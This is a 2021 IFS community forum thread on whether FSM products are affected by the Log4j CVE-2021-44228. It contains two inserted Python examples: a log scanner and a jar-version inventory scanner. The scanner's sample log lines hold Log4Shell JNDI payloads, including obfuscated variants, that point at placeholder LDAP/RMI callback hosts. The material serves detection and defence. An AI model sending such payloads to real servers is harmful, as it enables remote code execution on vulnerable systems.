Question

FSM component impacted by Apache Log4j vulnerability CVE-2021-44228

  • December 11, 2021
  • 9 replies
  • 821 views


Are any of the IFS FSM components (mainly the IFS FSM android application) impacted by the log4j vulnerability CVE-2021-44228? 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

9 replies

Shani Fernando
Hero (Employee)

Hi @TDCSOURABH,

This is to inform you that the IFS R&D Team is assessing whether the vulnerability affects IFS Applications/FSM/PSO/EOI, and based on that IFS R&D will recommend a corrective action.
We'll keep you updated on this.

Best Regards,
Shani 


  • Do Gooder (Customer)
  • 2 replies
  • December 12, 2021

Is there an update on this? I need to know if the IFS Application is affected and the recommended corrective action.


Jon Reid
Hero (Employee)
  • Hero (Employee)
  • 224 replies
  • December 12, 2021

FSM does not use Apache as a web server, it is a Windows IIS app. The description of the vulnerability says “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” - we don’t use direct LDAP access. So I don’t believe FSM is affected, but we’ll dig into it a bit more and confirm.

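The mechanism quoted in the post above (attacker-controlled text reaching a log4j 2.x logger while lookup substitution is enabled) is why the first practical check on any web tier, IIS included, is to hunt the access logs for `${jndi:` payloads in request fields that get logged, such as the User-Agent. The following is an added example, not code from this thread or from IFS. The log lines are constructed IIS W3C-style samples, the callback hosts are documentation addresses, and the obfuscations it unwinds (`${lower:x}`, `${upper:x}`, the `:-default` syntax such as `${::-j}` and `${env:NOPE:-j}`, and percent-encoding) are the publicly documented evasions for this CVE.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# Constructed sample lines in IIS W3C style (not real traffic and not from the thread).
# Fields: date time c-ip cs-method cs-uri-stem cs(User-Agent) sc-status
SAMPLE_LOG = [
    "2021-12-11 10:15:32 203.0.113.10 GET /fsm/login Mozilla/5.0+(Windows+NT+10.0) 200",
    "2021-12-11 10:15:40 203.0.113.10 GET /fsm/login ${jndi:ldap://203.0.113.77:1389/a} 200",
    "2021-12-11 10:15:41 203.0.113.10 GET /fsm/login ${${lower:j}${lower:n}di:ldap://203.0.113.77:1389/a} 200",
    "2021-12-11 10:15:42 203.0.113.10 GET /fsm/login ${${::-j}ndi:rmi://203.0.113.77:1099/a} 200",
    "2021-12-11 10:15:43 203.0.113.10 GET /fsm/login %24%7Bjndi%3Adns%3A%2F%2Fexample.com%7D 200",
    "2021-12-11 10:15:44 203.0.113.10 GET /fsm/login ${date:yyyy} 200",
    "2021-12-11 10:15:45 203.0.113.10 GET /fsm/login ${${env:NOPE:-j}ndi${env:NOPE:-:}ldap://203.0.113.77:1389/a} 200",
]

# log4j resolves inner lookups before it evaluates the outer "jndi:" prefix, so a detector
# has to do the same: ${lower:x}/${upper:x} become x, and "${key:-default}" becomes default
# when the key does not resolve (${::-j} and ${env:NOPE:-j} are the common forms).
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Final form: ${jndi:<scheme>://<host[:port]>...; the prefix is matched case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}]+)", re.I)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo percent-encoding, then resolve nested lookups from the inside out until stable.
    Case is folded because the jndi prefix is matched case-insensitively anyway."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def jndi_target(text: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, host[:port]) of the JNDI callback carried by the text, or None."""
    m = _JNDI.search(normalize(text))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Flag every line carrying a JNDI lookup; returns (line number, scheme, callback target).
    The target is the indicator to block at the egress firewall and to hunt for in DNS logs."""
    hits = []
    for n, line in enumerate(lines, start=1):
        target = jndi_target(line)
        if target:
            hits.append((n, target[0], target[1]))
    return hits


if __name__ == "__main__":
    for n, scheme, target in scan_lines(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme} to {target}")
```

Line 6 (`${date:yyyy}`) is deliberately not flagged: it is a lookup, but not a JNDI one, so it is noise for this CVE even though it shows someone probing for lookup substitution. A production rule would also run `normalize` over request headers other than User-Agent (X-Forwarded-For, Referer, form fields), since anything that ends up in a log4j message is in scope.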

  • Do Gooder (Customer)
  • 2 replies
  • December 12, 2021
Jon Reid wrote:

FSM does not use Apache as a web server, it is a Windows IIS app. The description of the vulnerability says “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” - we don’t use direct LDAP access. So I don’t believe FSM is affected, but we’ll dig into it a bit more and confirm.

We personally use the IFS 9 application, which is Java based. I only responded to this question rather than starting my own because Shani above mentioned that the R&D team is looking into the Application/FSM/PSO/EOI and would provide an update. I was looking for an update on it, specifically for the Application.


Jon Reid
Hero (Employee)
  • Hero (Employee)
  • 224 replies
  • December 12, 2021

The reported vulnerability cites log4j being used with JNDI (Java Naming and Directory Interface) to access LDAP.

I don’t see any references to log4j or  JNDI when browsing the FSMa (Mobile Android) code repository in Bitbucket.

Will still follow up with Mobile team to confirm.


  • Sidekick (Partner)
  • 27 replies
  • December 13, 2021

Hi, we have customers which are still running the IFS 8 SP1 (Foundation1 SP2) version with the old Log4j; they are checking whether IFS will release a patch regarding this.

https://vulners.com/github/GHSA-JFH8-C2JP-5V3Q

Please update this, thank you!

 


Jon Reid
Hero (Employee)
  • Hero (Employee)
  • 224 replies
  • December 13, 2021

This question was originally about the FSM product and the FSM Mobile client. I cannot supply any answer about IFS Applications 8 or 9; that should be its own separate topic.


Phil Lamerton
Superhero (Employee)
  • Superhero (Employee)
  • 531 replies
  • December 13, 2021

Please subscribe to this KBA, which will be updated every 24 hours.

 


OSHWLK
Sidekick (Employee)
  • 7 replies
  • December 23, 2021

Hi @Phil Lamerton ,

Noted that FSM and PSO were not affected by CVE-2021-44228 (Impact of CVE-2021-44228 on IFS Products, Services | IFS Community).

 

But I want to know whether any Log4j is used by FSM or PSO. If yes, what is the version?

 

Thanks

Oshan

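Both the repository check Jon describes earlier in the thread and the version question asked just above come down to the same inventory step on the deployed system: find every log4j-core jar (including ones nested inside WARs, EARs or fat jars, which a source-tree search misses), read the version from its `pom.properties`, and check whether `JndiLookup.class` is still present, since removing that class is the vendor-documented mitigation for releases that cannot be upgraded. The following is an added example in Python, not the thread's or IFS's code. The jars it scans are constructed in memory so it runs offline; `scan_directory` is the function you would point at a real deployment tree, and the vulnerable/fixed version boundaries (2.0-beta9 through 2.14.1 affected; 2.15.0+, 2.12.2+ and 2.3.1+ fixed) are taken from the Apache advisory for this CVE.

```python
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# Marker entries of a log4j-core 2.x jar (real paths in the published artefact).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str               # outer archive path; nested entries joined with "!"
    version: Optional[str]  # from pom.properties, None if absent
    has_jndi_lookup: bool   # JndiLookup.class still present in the jar
    vulnerable: bool        # verdict for CVE-2021-44228


def parse_version(pom_properties: str) -> Optional[str]:
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def version_tuple(version: str) -> tuple:
    # "2.0-beta9" -> (2, 0, 9); padded so that "2.15" compares as 2.15.0
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return (parts + (0, 0, 0))[:3]


def is_vulnerable_version(version: Optional[str], has_jndi_lookup: bool) -> bool:
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1. Fixed lines are
    2.15.0+ (Java 8), 2.12.2+ (Java 7 backport) and 2.3.1+ (Java 6 backport).
    A jar with JndiLookup.class deleted is reported as not vulnerable to this CVE."""
    if not has_jndi_lookup:
        return False
    if version is None:
        return True  # lookup class present, version unknown: assume the worst
    t = version_tuple(version)
    if t[0] != 2:
        return False  # only the 2.x line carries the affected JndiLookup
    fixed = (t >= (2, 15, 0)
             or (2, 12, 2) <= t < (2, 13, 0)
             or (2, 3, 1) <= t < (2, 4, 0))
    return not fixed


def scan_archive_bytes(data: bytes, path: str, findings: List[Finding]) -> None:
    """Inspect one archive and recurse into archives nested inside it (WAR/EAR/fat jar)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        has_lookup = JNDI_LOOKUP_CLASS in names
        version = None
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
        if has_lookup or version is not None:
            findings.append(Finding(path, version, has_lookup,
                                    is_vulnerable_version(version, has_lookup)))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive_bytes(zf.read(name), f"{path}!{name}", findings)


def scan_directory(root: str) -> List[Finding]:
    # Walk a deployment tree (an app server's lib/ and webapps/, say) and scan every archive.
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    scan_archive_bytes(fh.read(), full, findings)
    return findings


# Constructed fixtures: stand-ins for real jars that carry only the marker entries.
def build_fake_log4j_core(version: str, include_jndi_lookup: bool = True) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_fake_war(inner_jar: bytes, inner_name: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr(f"WEB-INF/lib/{inner_name}", inner_jar)
    return buf.getvalue()


def demo() -> List[Finding]:
    findings: List[Finding] = []
    scan_archive_bytes(build_fake_log4j_core("2.14.1"), "lib/log4j-core-2.14.1.jar", findings)
    scan_archive_bytes(build_fake_log4j_core("2.17.1"), "lib/log4j-core-2.17.1.jar", findings)
    scan_archive_bytes(build_fake_log4j_core("2.14.1", include_jndi_lookup=False),
                       "lib/log4j-core-2.14.1-stripped.jar", findings)
    scan_archive_bytes(build_fake_war(build_fake_log4j_core("2.11.2"), "log4j-core-2.11.2.jar"),
                       "webapps/app.war", findings)
    return findings


if __name__ == "__main__":
    for f in demo():
        print(f"{'VULNERABLE' if f.vulnerable else 'ok':10} {f.version or '?':8} "
              f"jndi={f.has_jndi_lookup!s:5} {f.path}")
```

Two caveats when running this against a real host: it only answers for CVE-2021-44228, so a 2.15.0 or 2.16.0 result is "not this CVE" rather than "current" (later advisories moved the recommended floor to 2.17.x), and it finds jars on disk only; a log4j-core bundled by a shaded build under a relocated package name, or loaded from a location outside the scanned tree, needs a process-level check (for example listing the loaded classes of the running JVM) rather than a file walk.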


